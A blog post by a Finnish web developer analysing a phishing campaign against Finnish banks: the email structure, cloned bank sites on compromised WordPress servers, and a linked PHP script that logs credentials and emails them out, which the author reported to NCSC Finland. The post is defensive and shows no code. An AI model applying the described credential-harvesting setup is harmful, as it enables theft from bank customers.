As we all know there are myriad of phishing e-mails sent every moment. Bank industry has always been one of the major targets, and for a reason.
Also Finnish banks have been scam targets for many times. Since Finnish language is quite hard, the quality of translated content in e-mails has been very poor… until very recent attempt which clearly differs from earlier ones.
Table of Contents
Contents of an E-mail
I have to admit as a native Finnish that this scam e-mail is very well written. There are some minor mistakes but it’s mostly like reading an official e-mail sent by the bank authors.
It seems that every major Finnish bank was a target. Scam e-mails were sent randomly where the recipients most likely got several e-mails from different banks.
I was able to scan all these different e-mails and it was obvious that there was time spent to create these dedicated e-mails for every bank. You can view the contents of an E-mail from here.
The structure of an e-mail is following:
- contact information (unique per bank),
- notification that account is about to expire and it needs to be renewed,
- masked link to the phishing site,
- list of benefits for being a customer (probably copied from website?),
- regards (unique per bank)
Phishing site itself is a realistic looking (or an actual) copy from the bank’s own website. It’s very hard to visually distinguish the phishing site from an actual website. The skeleton is from real bank’s website and the form content is modified.
I was lucky enough to receive all files of the infected website – both the user interface and the PHP script collecting and logging form data. As a web developer I noticed that this could have been done way better. But like I mentioned: the site looks and feels real, no matter how things are under the hood.
The Code Behind
I won’t go through the user interface itself since there’s nothing that interesting. If you’re interested to see screen captures, check this article (in Finnish).
What I was interested of was how it worked. I quickly found out that all the data was logged into a text file. This file contained all the posted data. Sadly I found out that there were real and sensitive information posted by many users.
I reported these findings to “National Cyber Security Centre Finland” and got a quick response that they had found out this logic and there were about 40 infected sites collecting information. I don’t know how many credentials were totally leaked. But every log file I went through contained 5 – 15 real credentials and few fake ones.
You can view the actual PHP script from here. As you can see, it’s very simple and crude. But it does the job it was meant for – logs the data and sends it via e-mail.
I noticed few patterns when going through infected websites:
- they are mostly WordPress sites,
- some of the infected sites are located in Romania
There are no assumptions to be made since security holes and evil people are everywhere. However this was well planned by compromising several WordPress sites instead of having free .tk websites popped out.
NCSC Finland has done an excellent job by informing the administrators of compromised websites to remove phishing page and / or block the request. Additionally all the banks and Finnish media has taken actions to inform about this threat which probably minimises all the damage.
Certainly these phishing attempts are getting more professional all the time. What comes to me, I’ve personally spent time to report mostly reflected XSS flaws (also to banks). And I see it as a very big threat when well formed e-mails and even the smallest one security flaws on banks’ websites are used together. This applies also on e-commerce and other websites dealing with serious money.